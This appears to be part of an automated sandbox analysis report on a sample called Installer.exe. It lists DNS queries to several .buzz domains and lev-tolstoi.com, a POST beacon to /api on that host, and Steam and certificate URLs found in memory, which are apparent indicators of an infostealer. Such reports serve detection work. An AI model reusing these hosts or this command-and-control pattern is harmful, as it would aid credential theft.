                Source: Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=fd92c37599526c48ee9a2e2b; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 27 Dec 2024 22:13:26 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Controloz2 equals www.youtube.com (Youtube)
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
                Source: global trafficDNS traffic detected: DNS query: prisonyfork.buzz
                Source: global trafficDNS traffic detected: DNS query: rebuildeso.buzz
                Source: global trafficDNS traffic detected: DNS query: scentniej.buzz
                Source: global trafficDNS traffic detected: DNS query: inherineau.buzz
                Source: global trafficDNS traffic detected: DNS query: screwamusresz.buzz
                Source: global trafficDNS traffic detected: DNS query: appliacnesot.buzz
                Source: global trafficDNS traffic detected: DNS query: cashfuzysao.buzz
                Source: global trafficDNS traffic detected: DNS query: hummskitnj.buzz
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: Installer.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Installer.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: Installer.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: Installer.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: Installer.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Installer.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: Installer.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Installer.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.0000000003596000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1973390326.0000000003594000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.coc.
                Source: Installer.exeString found in binary or memory: http://ocsp.digicert.com0
                Source: Installer.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: Installer.exeString found in binary or memory: http://ocsp.entrust.net02
                Source: Installer.exeString found in binary or memory: http://ocsp.entrust.net03
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: Installer.exeString found in binary or memory: http://www.digicert.com/CPS0
                Source: Installer.exeString found in binary or memory: http://www.entrust.net/rpa03
                Source: Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: Installer.exe, 00000003.00000003.1831936100.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: Installer.exe, 00000003.00000003.1831936100.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.0000000003596000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1973390326.0000000003594000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.0000000003596000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1973390326.0000000003594000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.0000000003596000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1973390326.0000000003594000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
